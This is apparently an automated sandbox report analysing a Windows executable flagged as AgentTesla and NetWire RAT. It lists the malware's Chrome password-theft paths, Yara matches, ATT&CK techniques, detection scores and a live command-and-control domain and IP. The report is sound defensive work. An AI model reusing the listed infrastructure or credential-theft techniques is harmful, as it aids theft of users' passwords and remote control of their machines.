                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_004130E8 GetUserNameW,9_2_004130E8

                      Stealing of Sensitive Information:

                      barindex
                      Contains functionality to steal Chrome passwords or cookiesShow sources
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: %s\Google\Chrome\User Data\Default\Login Data9_2_0040F281
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: %s\Chromium\User Data\Default\Login Data9_2_0040F382

                      Remote Access Functionality:

                      barindex
                      Yara detected NetWire RATShow sources
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.g94e4BgSRN.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.g94e4BgSRN.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.18.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.g94e4BgSRN.exe.3873c18.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.g94e4BgSRN.exe.400000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.g94e4BgSRN.exe.389be38.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.286467177.00000000026AB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.282165749.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.280983052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.281635680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.283998783.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.276611463.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.279964505.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.287524308.0000000003873000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: g94e4BgSRN.exe PID: 6384, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: g94e4BgSRN.exe PID: 6976, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection112Masquerading1OS Credential Dumping1Security Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools11Credentials In Files1Process Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol21Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery13Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      g94e4BgSRN.exe49%VirustotalBrowse
                      g94e4BgSRN.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\SiEKNQVnm.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      9.0.g94e4BgSRN.exe.400000.14.unpack100%AviraTR/Spy.GenDownload File
                      9.0.g94e4BgSRN.exe.400000.10.unpack100%AviraTR/Spy.GenDownload File
                      9.0.g94e4BgSRN.exe.400000.6.unpack100%AviraTR/Spy.GenDownload File
                      9.0.g94e4BgSRN.exe.400000.8.unpack100%AviraTR/Spy.GenDownload File
                      9.0.g94e4BgSRN.exe.400000.18.unpack100%AviraTR/Spy.GenDownload File
                      0.2.g94e4BgSRN.exe.3873c18.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                      9.0.g94e4BgSRN.exe.400000.12.unpack100%AviraTR/Spy.GenDownload File
                      9.0.g94e4BgSRN.exe.400000.16.unpack100%AviraTR/Spy.GenDownload File
                      9.0.g94e4BgSRN.exe.400000.4.unpack100%AviraTR/Spy.GenDownload File
                      9.2.g94e4BgSRN.exe.400000.0.unpack100%AviraTR/Spy.GenDownload File
                      0.2.g94e4BgSRN.exe.389be38.6.unpack100%AviraTR/Patched.Ren.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      podzeye.duckdns.org6%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y0n10%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.carterandcone.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y0n0%Avira URL Cloudsafe
                      http://www.yandex.comsocks=0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/00%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/n-u0%URL Reputationsafe
                      http://www.fonts.comn0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                      http://www.fontbureau.comceTFp0%Avira URL Cloudsafe
                      http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                      http://www.carterandcone.como.2K-0%Avira URL Cloudsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.carterandcone.como.0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.carterandcone.comTC0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.fontbureau.coma0%URL Reputationsafe
                      podzeye.duckdns.org:66880%Avira URL Cloudsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.fontbureau.come0%URL Reputationsafe
                      http://www.carterandcone.como.)K0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/k0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/f0%URL Reputationsafe
                      http://www.tiro.comlar?0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn)0%URL Reputationsafe
                      http://www.founder.com.cn/cn#0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      podzeye.duckdns.org
                      		109.205.178.244
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      podzeye.duckdns.org:6688true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.fontbureau.com/designersGg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designers/?g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers?g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/Y0n1g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tiro.comg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                              		high
                              http://www.goodfont.co.krg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comg94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249404999.00000000057FD000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249294569.00000000057FE000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249210789.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249341645.00000000057FD000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249888666.00000000057F4000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn/cTheg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y0ng94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.yandex.comsocks=g94e4BgSRN.exe, 00000000.00000002.286467177.00000000026AB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.287524308.0000000003873000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000000.282165749.0000000000400000.00000040.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000000.276611463.0000000000400000.00000040.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://www.jiyu-kobo.co.jp/0g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/n-ug94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fonts.comng94e4BgSRN.exe, 00000000.00000003.246496422.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246471898.000000000580B000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleaseg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y0g94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comceTFpg94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ascendercorp.com/typedesigners.htmlg94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.como.2K-g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://www.fonts.comg94e4BgSRN.exe, 00000000.00000003.246496422.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246436621.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246372251.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                                		high
                                http://www.sandoll.co.krg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cng94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249133388.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249210789.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameg94e4BgSRN.exe, 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.carterandcone.como.g94e4BgSRN.exe, 00000000.00000003.249228910.00000000057FE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sakkal.comg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.comg94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.carterandcone.comTCg94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.yandex.comg94e4BgSRN.exefalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/jp/g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.comag94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.carterandcone.comlg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cng94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlg94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comeg94e4BgSRN.exe, 00000000.00000003.251756053.00000000057F4000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.como.)Kg94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.jiyu-kobo.co.jp/g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/kg94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.jiyu-kobo.co.jp/fg94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.tiro.comlar?g94e4BgSRN.exe, 00000000.00000003.247402628.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.247429610.000000000580B000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.founder.com.cn/cn)g94e4BgSRN.exe, 00000000.00000003.248047122.00000000057FD000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cn#g94e4BgSRN.exe, 00000000.00000003.248047122.00000000057FD000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              109.205.178.244
                                              		podzeye.duckdns.orgGermany
                                              		12586ASGHOSTNETDEtrue

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:553285
                                              Start date:14.01.2022
                                              Start time:15:54:16
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 8m 56s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:g94e4BgSRN.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:32
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@9/8@1/1
                                              EGA Information:
                                              • Successful, ratio: 50%
                                              HDC Information:
                                              • Successful, ratio: 2.8% (good quality ratio 1.4%)
                                              • Quality average: 38.5%
                                              • Quality standard deviation: 41.8%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 36
                                              • Number of non-executed functions: 33
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                              • Execution Graph export aborted for target g94e4BgSRN.exe, PID 6976 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              15:55:22API Interceptor2x Sleep call for process: g94e4BgSRN.exe modified
                                              15:55:26API Interceptor30x Sleep call for process: powershell.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              109.205.178.244IMAGE0113.exeGet hashmaliciousBrowse
                                                QgArQOctY9.exeGet hashmaliciousBrowse
                                                  Fwm9y3IpiQ.exeGet hashmaliciousBrowse
                                                    fIjqTjnGW1.exeGet hashmaliciousBrowse
                                                      SRV7387387.exeGet hashmaliciousBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        podzeye.duckdns.orgIMAGE0113.exeGet hashmaliciousBrowse
                                                        • 109.205.178.244
                                                        QgArQOctY9.exeGet hashmaliciousBrowse
                                                        • 109.205.178.244
                                                        Fwm9y3IpiQ.exeGet hashmaliciousBrowse
                                                        • 109.205.178.244
                                                        fIjqTjnGW1.exeGet hashmaliciousBrowse
                                                        • 109.205.178.244
                                                        SRV7387387.exeGet hashmaliciousBrowse
                                                        • 109.205.178.244
                                                        PO1104994.exeGet hashmaliciousBrowse
                                                        • 143.198.42.214
                                                        qjSBvGbPyK.exeGet hashmaliciousBrowse
                                                        • 144.126.145.38
                                                        IMG0038.exeGet hashmaliciousBrowse
                                                        • 194.233.74.91
                                                        IMAGE00037.exeGet hashmaliciousBrowse
                                                        • 178.18.247.188
                                                        INV9938929.exeGet hashmaliciousBrowse
                                                        • 178.18.247.188
                                                        Rechnung.exeGet hashmaliciousBrowse
                                                        • 79.134.225.39
                                                        UFvnU6nahx.exeGet hashmaliciousBrowse
                                                        • 79.134.225.39
                                                        MzMb9GHlQQ.exeGet hashmaliciousBrowse
                                                        • 79.134.225.39
                                                        Rc93GKN1MJ.exeGet hashmaliciousBrowse
                                                        • 138.197.161.207
                                                        Image0017.exeGet hashmaliciousBrowse
                                                        • 138.197.161.207
                                                        Image009.exeGet hashmaliciousBrowse
                                                        • 194.5.98.64
                                                        WwTSpI2hvx.exeGet hashmaliciousBrowse
                                                        • 62.128.217.91
                                                        ibgcrnNmhB.exeGet hashmaliciousBrowse
                                                        • 105.112.25.130
                                                        INV9938884.exeGet hashmaliciousBrowse
                                                        • 154.118.49.103

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        ASGHOSTNETDE00B5C410D204D6A92F6636E23998777D2716E8928F96B.exeGet hashmaliciousBrowse
                                                        • 5.230.70.102
                                                        VmIzagkjCN.exeGet hashmaliciousBrowse
                                                        • 5.230.70.102
                                                        2N9a9kQBFI.exeGet hashmaliciousBrowse
                                                        • 5.230.67.58
                                                        ZMeGwXn01C.exeGet hashmaliciousBrowse
                                                        • 5.230.67.58
                                                        GLS7GMyx7X.exeGet hashmaliciousBrowse
                                                        • 5.230.67.58
